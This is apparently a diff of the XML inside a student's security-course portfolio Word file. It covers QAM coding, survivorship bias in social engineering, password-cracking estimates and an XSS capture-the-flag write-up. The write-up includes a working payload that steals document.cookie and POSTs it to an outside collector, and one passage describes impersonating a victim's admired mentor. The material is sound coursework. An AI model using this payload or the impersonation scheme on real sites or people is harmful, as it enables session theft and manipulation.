+                            <a:noFill/>
+                          </a:ln>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                  <wp14:sizeRelH relativeFrom="margin">
+                    <wp14:pctWidth>0</wp14:pctWidth>
+                  </wp14:sizeRelH>
+                  <wp14:sizeRelV relativeFrom="margin">
+                    <wp14:pctHeight>0</wp14:pctHeight>
+                  </wp14:sizeRelV>
+                </wp:anchor>
+              </w:drawing>
             </w:r>
           </w:p>
           <w:p>
-            <w:hyperlink r:id="rId9" w:history="1">
+            <w:r>
+              <w:t>Left: Example of a QAM coding scheme waveform from [1] Right : System diagram of how coding works from [2]</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Link:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:i/>
+                <w:iCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:hyperlink r:id="rId11" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
+                  <w:i/>
+                  <w:iCs/>
                 </w:rPr>
                 <w:t>https://insidegnss.com/codes-the-prn-family-grows-again/</w:t>
               </w:r>
             </w:hyperlink>
             <w:r>
+              <w:rPr>
+                <w:i/>
+                <w:iCs/>
+              </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
           </w:p>
@@ -270,40 +434,25 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:highlight w:val="yellow"/>
         </w:rPr>
       </w:pPr>
-      <w:commentRangeStart w:id="0"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Humans, Measuring</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:commentReference w:id="0"/>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId14">
+      <w:hyperlink r:id="rId12">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
+            <w:highlight w:val="green"/>
           </w:rPr>
           <w:t>Research a Cognitive Vulnerability</w:t>
         </w:r>
@@ -348,7 +497,7 @@
             <w:r>
               <w:t xml:space="preserve">Link: </w:t>
             </w:r>
-            <w:hyperlink r:id="rId15" w:history="1">
+            <w:hyperlink r:id="rId13" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -374,14 +523,219 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>When applied to a security context, survivorship bias can make a person’s behaviour easier to predict. For example, someone may strongly admire senior mentors, supervisors in high-paying industries, or relatives who have succeeded in selective fields. An attacker could use this pattern to create a social engineering scenario that feels personally relevant and trustworthy. They might impersonate or compromise the profile of a respected person in an engineering field, then send targeted information or opportunities that align with the victim’s career goals and fulfill the ease of progression that the victim is expecting. Because the message appears connected to someone the victim admires, the victim may be more willing to take risks they would usually question. This could help the attacker build trust, influence communication, and gradually create more opportunities to exploit the victim.</w:t>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:drawing>
+                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="482BF733" wp14:editId="79767977">
+                  <wp:simplePos x="0" y="0"/>
+                  <wp:positionH relativeFrom="column">
+                    <wp:posOffset>-2307</wp:posOffset>
+                  </wp:positionH>
+                  <wp:positionV relativeFrom="paragraph">
+                    <wp:posOffset>72</wp:posOffset>
+                  </wp:positionV>
+                  <wp:extent cx="4027990" cy="3219241"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
+                  <wp:wrapSquare wrapText="bothSides"/>
+                  <wp:docPr id="606947453" name="Picture 4"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="0" name="Picture 2"/>
+                          <pic:cNvPicPr>
+                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                          </pic:cNvPicPr>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId14">
+                            <a:extLst>
+                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                              </a:ext>
+                            </a:extLst>
+                          </a:blip>
+                          <a:srcRect/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr bwMode="auto">
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="4027990" cy="3219241"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                          <a:noFill/>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:anchor>
+              </w:drawing>
             </w:r>
           </w:p>
           <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <mc:AlternateContent>
+                <mc:Choice Requires="wps">
+                  <w:drawing>
+                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="203E0B2A" wp14:editId="5EF43399">
+                      <wp:simplePos x="0" y="0"/>
+                      <wp:positionH relativeFrom="column">
+                        <wp:posOffset>167005</wp:posOffset>
+                      </wp:positionH>
+                      <wp:positionV relativeFrom="paragraph">
+                        <wp:posOffset>2863850</wp:posOffset>
+                      </wp:positionV>
+                      <wp:extent cx="3858895" cy="541020"/>
+                      <wp:effectExtent l="0" t="0" r="8255" b="0"/>
+                      <wp:wrapSquare wrapText="bothSides"/>
+                      <wp:docPr id="1574389247" name="Text Box 1"/>
+                      <wp:cNvGraphicFramePr/>
+                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                          <wps:wsp>
+                            <wps:cNvSpPr txBox="1"/>
+                            <wps:spPr>
+                              <a:xfrm>
+                                <a:off x="0" y="0"/>
+                                <a:ext cx="3858895" cy="541020"/>
+                              </a:xfrm>
+                              <a:prstGeom prst="rect">
+                                <a:avLst/>
+                              </a:prstGeom>
+                              <a:solidFill>
+                                <a:prstClr val="white"/>
+                              </a:solidFill>
+                              <a:ln>
+                                <a:noFill/>
+                              </a:ln>
+                            </wps:spPr>
+                            <wps:txbx>
+                              <w:txbxContent>
+                                <w:p>
+                                  <w:pPr>
+                                    <w:pStyle w:val="Caption"/>
+                                    <w:rPr>
+                                      <w:noProof/>
+                                    </w:rPr>
+                                  </w:pPr>
+                                  <w:r>
+                                    <w:t xml:space="preserve">Figure </w:t>
+                                  </w:r>
+                                  <w:r>
+                                    <w:fldChar w:fldCharType="begin"/>
+                                  </w:r>
+                                  <w:r>
+                                    <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
+                                  </w:r>
+                                  <w:r>
+                                    <w:fldChar w:fldCharType="separate"/>
+                                  </w:r>
+                                  <w:r>
+                                    <w:rPr>
+                                      <w:noProof/>
+                                    </w:rPr>
+                                    <w:t>1</w:t>
+                                  </w:r>
+                                  <w:r>
+                                    <w:fldChar w:fldCharType="end"/>
+                                  </w:r>
+                                  <w:r>
+                                    <w:t xml:space="preserve"> Survivorship Bias </w:t>
+                                  </w:r>
+                                  <w:r>
+                                    <w:t>during the Second World War, the bullet holes on aircraft that returned marked out the areas that were not crucial to the planes’ integrity.Credit: Martin Grandjean (vector), McGeddon (picture), Cameron Moll (concept) (CC BY-SA 4.0)</w:t>
+                                  </w:r>
+                                </w:p>
+                              </w:txbxContent>
+                            </wps:txbx>
+                            <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                              <a:prstTxWarp prst="textNoShape">
+                                <a:avLst/>
+                              </a:prstTxWarp>
+                              <a:noAutofit/>
+                            </wps:bodyPr>
+                          </wps:wsp>
+                        </a:graphicData>
+                      </a:graphic>
+                      <wp14:sizeRelH relativeFrom="margin">
+                        <wp14:pctWidth>0</wp14:pctWidth>
+                      </wp14:sizeRelH>
+                      <wp14:sizeRelV relativeFrom="margin">
+                        <wp14:pctHeight>0</wp14:pctHeight>
+                      </wp14:sizeRelV>
+                    </wp:anchor>
+                  </w:drawing>
+                </mc:Choice>
+                <mc:Fallback>
+                  <w:pict>
+                    <v:shapetype w14:anchorId="203E0B2A" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                      <v:stroke joinstyle="miter"/>
+                      <v:path gradientshapeok="t" o:connecttype="rect"/>
+                    </v:shapetype>
+                    <v:shape id="Text Box 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:13.15pt;margin-top:225.5pt;width:303.85pt;height:42.6pt;z-index:251662336;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                      <v:textbox inset="0,0,0,0">
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Caption"/>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:fldChar w:fldCharType="begin"/>
+                            </w:r>
+                            <w:r>
+                              <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
+                            </w:r>
+                            <w:r>
+                              <w:fldChar w:fldCharType="separate"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                              <w:t>1</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:fldChar w:fldCharType="end"/>
+                            </w:r>
+                            <w:r>
+                              <w:t xml:space="preserve"> Survivorship Bias </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>during the Second World War, the bullet holes on aircraft that returned marked out the areas that were not crucial to the planes’ integrity.Credit: Martin Grandjean (vector), McGeddon (picture), Cameron Moll (concept) (CC BY-SA 4.0)</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </v:textbox>
+                      <w10:wrap type="square"/>
+                    </v:shape>
+                  </w:pict>
+                </mc:Fallback>
+              </mc:AlternateContent>
+            </w:r>
+            <w:r>
+              <w:t>When applied to a security context, survivorship bias can make a person’s behaviour easier to predict. For example, someone may strongly admire senior mentors, supervisors in high-paying industries, or relatives who have succeeded in selective fields. An attacker could use this pattern to create a social engineering scenario that feels personally relevant and trustworthy. They might impersonate or compromise the profile of a respected person in an engineering field, then send targeted information or opportunities that align with the victim’s career goals and fulfill the ease of progression that the victim is expecting. Because the message appears connected to someone the victim admires, the victim may be more willing to take risks they would usually question. This could help the attacker build trust, influence communication, and gradually create more opportunities to exploit the victim.</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:rPr>
@@ -410,7 +764,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId16">
+      <w:hyperlink r:id="rId15">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -501,7 +855,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId17">
+      <w:hyperlink r:id="rId16">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -528,7 +882,7 @@
             <w:tcW w:w="9360" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:commentRangeStart w:id="1"/>
+            <w:commentRangeStart w:id="0"/>
           </w:p>
           <w:tbl>
             <w:tblPr>
@@ -1535,7 +1889,6 @@
                       <w:color w:val="333333"/>
                       <w:lang w:eastAsia="en-AU"/>
                     </w:rPr>
-                    <w:lastRenderedPageBreak/>
                     <w:t>Large Organisation</w:t>
                   </w:r>
                 </w:p>
@@ -1666,6 +2019,7 @@
                       <w:color w:val="333333"/>
                       <w:lang w:eastAsia="en-AU"/>
                     </w:rPr>
+                    <w:lastRenderedPageBreak/>
                     <w:t>I</w:t>
                   </w:r>
                   <w:r>
@@ -1706,6 +2060,7 @@
                       <w:color w:val="333333"/>
                       <w:lang w:eastAsia="en-AU"/>
                     </w:rPr>
+                    <w:lastRenderedPageBreak/>
                     <w:t> </w:t>
                   </w:r>
                   <w:r>
@@ -2666,7 +3021,7 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:hyperlink r:id="rId18" w:anchor="date" w:history="1">
+            <w:hyperlink r:id="rId17" w:anchor="date" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -2707,7 +3062,7 @@
             <w:r>
               <w:t xml:space="preserve">Most Common CPU according to is the Ryzen 5: </w:t>
             </w:r>
-            <w:hyperlink r:id="rId19" w:anchor="cpu-commonality" w:history="1">
+            <w:hyperlink r:id="rId18" w:anchor="cpu-commonality" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -2768,7 +3123,6 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:lastRenderedPageBreak/>
               <w:t>I am assuming that this person will spend approximately 75%</w:t>
             </w:r>
             <w:r>
@@ -2804,6 +3158,7 @@
               </w:rPr>
             </w:pPr>
             <w:r>
+              <w:lastRenderedPageBreak/>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
@@ -3239,14 +3594,14 @@
                 <m:t xml:space="preserve">bits/day </m:t>
               </m:r>
             </m:oMath>
-            <w:commentRangeEnd w:id="1"/>
+            <w:commentRangeEnd w:id="0"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="CommentReference"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:commentReference w:id="1"/>
+              <w:commentReference w:id="0"/>
             </w:r>
           </w:p>
           <w:p>
@@ -3440,7 +3795,6 @@
                 <w:color w:val="333333"/>
                 <w:lang w:eastAsia="en-AU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>Note that we likely don’t have public knowledge of all processors available to some intelligence agencies which can in some cases perform exceptionally better than an estimate</w:t>
             </w:r>
             <w:r>
@@ -3643,7 +3997,7 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId20">
+      <w:hyperlink r:id="rId23">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3735,7 +4089,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId21"/>
+                          <a:blip r:embed="rId24"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -3761,7 +4115,6 @@
               <w:rPr>
                 <w:noProof/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:drawing>
                 <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B7076E" wp14:editId="66240762">
                   <wp:extent cx="5498327" cy="2753275"/>
@@ -3778,7 +4131,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId22"/>
+                          <a:blip r:embed="rId25"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -3839,6 +4192,7 @@
               </w:numPr>
             </w:pPr>
             <w:r>
+              <w:lastRenderedPageBreak/>
               <w:t>Then I tried with console.log(1) as the on error to see if that gets sanitized or not, which it didn’t, so then I found my entry point for javascript injection</w:t>
             </w:r>
           </w:p>
@@ -3868,15 +4222,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve">https://xss5.comp6841.xyz/complaints#%3Cb%3EURL%20must%20be%20from%20xss5.comp6841.xyz%3C/b%3E%3Cimg%20src=x%20onerror=%22fetch('https://wh5ff260035b939895bf.free.beeceptor.com',{method: 'POST',headers: {'Content-Type': 'application/json'},body: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>decodeURIComponent(document.cookie)})"&gt;</w:t>
+              <w:t>https://xss5.comp6841.xyz/complaints#%3Cb%3EURL%20must%20be%20from%20xss5.comp6841.xyz%3C/b%3E%3Cimg%20src=x%20onerror=%22fetch('https://wh5ff260035b939895bf.free.beeceptor.com',{method: 'POST',headers: {'Content-Type': 'application/json'},body: decodeURIComponent(document.cookie)})"&gt;</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3898,7 +4244,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId23"/>
+                          <a:blip r:embed="rId26"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -3940,7 +4286,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId24"/>
+                          <a:blip r:embed="rId27"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -4005,7 +4351,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId25">
+      <w:hyperlink r:id="rId28">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4064,7 +4410,6 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:lastRenderedPageBreak/>
               <w:t>We first discussed the risk of entrusting the passcode to Bess, since her personal connection made her vulnerable to social engineering. I agreed the secret should move to another mechanism, as any single person becomes a weak target that many mediums could pressure or exploit.</w:t>
             </w:r>
           </w:p>
@@ -4222,6 +4567,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Wrap up</w:t>
       </w:r>
     </w:p>
@@ -4238,9 +4584,25 @@
         <w:t>To submit a valid portfolio entry, complete the activities, save your work as a PDF, and upload it to the relevant week’s submission page on Moodle.</w:t>
       </w:r>
     </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[1] Institute of Telecommunications, University of Stuttgart, “Channel Coding Web Demonstration,” University of Stuttgart. [Online]. Available: https://webdemo.inue.uni-stuttgart.de/webdemos/03_theses/chCoding/index.php?id=1. [Accessed: Jun. 22, 2026].</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>[2] Rahsoft, “Understanding Quadrature Amplitude Modulation (QAM) and Its Applications,” Feb. 28, 2025. [Online]. Available: https://rahsoft.com/2025/02/28/understanding-quadrature-amplitude-modulation-qam-and-its-applications/. [Accessed: Jun. 22, 2026].</w:t>
+      </w:r>
+    </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId26"/>
-      <w:footerReference w:type="default" r:id="rId27"/>
+      <w:headerReference w:type="default" r:id="rId29"/>
+      <w:footerReference w:type="default" r:id="rId30"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -4252,23 +4614,7 @@
 
 <file path=word/comments.xml><?xml version="1.0" encoding="utf-8"?>
 <w:comments xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
-  <w:comment w:id="0" w:author="Thomas A. Gosman" w:date="2026-06-17T07:21:00Z" w:initials="TG">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>Diagram Still Required, Summarised Post Required</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="1" w:author="Thomas A. Gosman" w:date="2026-06-20T11:12:00Z" w:initials="TG">
+  <w:comment w:id="0" w:author="Thomas A. Gosman" w:date="2026-06-20T11:12:00Z" w:initials="TG">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -4289,21 +4635,18 @@
 
 <file path=word/commentsExtended.xml><?xml version="1.0" encoding="utf-8"?>
 <w15:commentsEx xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
-  <w15:commentEx w15:paraId="021B784C" w15:done="0"/>
   <w15:commentEx w15:paraId="1A27AC78" w15:done="0"/>
 </w15:commentsEx>
 </file>
 
 <file path=word/commentsExtensible.xml><?xml version="1.0" encoding="utf-8"?>
 <w16cex:commentsExtensible xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:cr="http://schemas.microsoft.com/office/comments/2020/reactions" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" 